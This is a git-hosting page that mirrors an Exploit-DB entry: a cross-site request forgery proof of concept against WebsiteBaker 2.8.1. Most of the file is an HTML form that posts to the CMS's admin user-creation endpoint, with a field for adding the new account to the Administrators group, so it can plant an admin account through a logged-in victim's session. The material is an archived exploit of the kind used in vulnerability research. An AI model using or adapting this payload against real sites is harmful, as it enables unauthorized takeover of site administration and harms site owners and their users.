bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/13938.html
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

104 lines
No EOL
2.5 KiB
HTML
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Author: Luis Santana
# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
# Version: 2.8.1
# Tested on: All
# Code : http://hacktalk.net/exploits/websitebakercsrfPOC.zip
The full advisory can be found at
http://hacktalk.net/exploits/websitebakerCSRF.txt
Regards,
Luis Santana
Admin - http://hacktalk.net
HackTalk Security
<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
<form name="user"action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="username_fieldname" value="username_08y7h65u" />
<table cellpadding="5" cellspacing="0" border="0" width="100%">
<tr>
<td width="150">Username:</td>
<td class="value_input">
<input type="text" name="username_08y7h65u" maxlength="30" value="" />
</td>
</tr>
<tr>
<td>Password:</td>
<td class="value_input">
<input type="password" name="password" maxlength="30" />
</td>
</tr>
<tr>
<td>Re-type Password:</td>
<td class="value_input">
<input type="password" name="password2" maxlength="30" />
</td>
</tr>
<tr style="display:none;">
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
</tr>
<tr>
<td>Display Name:</td>
<td class="value_input">
<input type="text" name="display_name" maxlength="255" value="" />
</td>
</tr>
<tr>
<td>Email:</td>
<td class="value_input">
<input type="text" name="email" maxlength="255" value="" />
</td>
</tr>
<tr style="">
<td>Home Folder:</td>
<td class="value_input">
<select name="home_folder">
<option value="">None</option>
<option value="/testbild" >/media/testbild</option>
</select>
</td>
</tr>
<tr>
<td>Group:</td>
<td class="value_input">
<select name="groups[]" multiple="multiple" size="5">
<option value="1" >Administrators</option>
</select>
</td>
</tr>
<tr>
<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
<input type="radio" name="active[]" id="disabled" value="0" />
<label for="disabled">Disabled</label>
</td>
</tr>
<tr>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />
</td>
</tr>
</table>
</form>
<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>
Reference in a new issue View git blame Copy permalink